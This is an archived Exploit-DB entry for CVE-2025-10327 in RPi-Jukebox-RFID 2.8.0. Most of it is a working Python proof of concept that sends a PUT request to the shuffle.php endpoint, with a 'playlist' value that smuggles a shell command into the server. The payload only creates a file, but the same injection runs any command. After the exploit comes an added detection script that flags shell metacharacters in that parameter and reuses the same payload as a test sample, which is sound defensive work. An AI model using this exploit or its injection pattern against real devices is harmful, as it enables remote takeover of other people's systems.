
[webapps] RPi-Jukebox-RFID 2.8.0 - Remote Command Execution

Source: Exploit DB (archived Mar 16, 2026)



EDB-ID: 52468
CVE: 2025-10327
Author: BEATRIZ FRESNO NAUMOVA
Type: WEBAPPS
Platform: MULTIPLE
Date: 2026-01-17

# Exploit Title: RPi-Jukebox-RFID 2.8.0 - Remote Code Execution
# Date: 2025-09-25
# Exploit Author: Beatriz Fresno Naumova
# Vendor Homepage: https://github.com/MiczFlor/RPi-Jukebox-RFID
# Software Link: https://github.com/MiczFlor/RPi-Jukebox-RFID/releases/tag/v2.8.0
# Version: 2.8.0
# Tested on: Raspberry Pi OS with RPi-Jukebox-RFID v2.8.0
# CVE: CVE-2025-10327
#
# Description:
# This PoC demonstrates an OS command injection vulnerability in the shuffle.php API endpoint.
# The vulnerable parameter "playlist" is passed directly to a shell command without sanitization,
# allowing an attacker to execute arbitrary system commands.

import requests
import json

# Replace this with the actual target IP or hostname
TARGET = "http://YOUR-TARGET-IP/phoniebox/api/playlist/shuffle.php"

# Payload to inject – here we create a file as proof of execution
INJECTED_COMMAND = "test';touch rced_by_xu17.txt;echo '"

# JSON payload for the request
payload = {
    "playlist": INJECTED_COMMAND,
    "shuffle": "true"
}

# HTTP headers
headers = {
    "Content-Type": "application/json",
    "User-Agent": "Mozilla/5.0"
}

def exploit():
    print("[+] Sending malicious JSON payload to trigger command injection...")
    try:
        response = requests.put(TARGET, headers=headers, data=json.dumps(payload), timeout=5)
        print(f"[+] HTTP Status Code: {response.status_code}")
        print("[*] If the target is vulnerable, the command should be executed on the server.")
    except Exception as e:
        print(f"[-] Exploit failed: {e}")

if __name__ == "__main__":
    exploit()
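A detection-side companion to the PoC above, added here as an example and not part of the Exploit-DB entry or the RPi-Jukebox-RFID project: it inspects JSON bodies sent to the shuffle.php endpoint and flags "playlist" values containing shell metacharacters. The function names, the metacharacter list and the sample requests are assumptions constructed for illustration.

```python
import json
import re

# Endpoint path and parameter name are taken from the PoC above.
ENDPOINT_SUFFIX = "/api/playlist/shuffle.php"
PARAM = "playlist"

# Characters and sequences that change how a shell parses a string.
# Assumption: legitimate playlist names on this deployment never contain them.
SHELL_META = re.compile(r"""['"`;|&<>\n\r\\]|\$\(|\$\{""")

def inspect_request(method, path, body):
    """Return a finding dict if the request looks like injection, else None."""
    if not path.split("?", 1)[0].endswith(ENDPOINT_SUFFIX):
        return None
    finding = {"method": method, "path": path}
    try:
        data = json.loads(body)
    except (ValueError, TypeError):
        return {**finding, "reason": "unparseable JSON body"}
    if not isinstance(data, dict):
        return {**finding, "reason": "JSON body is not an object"}
    value = data.get(PARAM)
    if value is None:
        return None
    if not isinstance(value, str):
        return {**finding, "reason": "playlist is not a string"}
    hits = sorted(set(SHELL_META.findall(value)))
    if hits:
        return {**finding, "reason": "shell metacharacters", "chars": hits}
    return None

# Constructed sample requests (method, path, body); not captured traffic.
SAMPLES = [
    ("PUT", "/phoniebox/api/playlist/shuffle.php",
     '{"playlist": "Kids Songs 01", "shuffle": "true"}'),
    ("PUT", "/phoniebox/api/playlist/shuffle.php",
     json.dumps({"playlist": "test';touch rced_by_xu17.txt;echo '", "shuffle": "true"})),
    ("PUT", "/phoniebox/api/playlist/shuffle.php", "{not json"),
    ("GET", "/unrelated/path", ""),
]

def scan(samples):
    """Run inspect_request over every sample and keep only the findings."""
    return [f for f in (inspect_request(*s) for s in samples) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLES):
        print(finding)
```

A match is a reason to review the request, not proof of compromise; the durable fix is on the server side, where the value must never reach a shell unescaped.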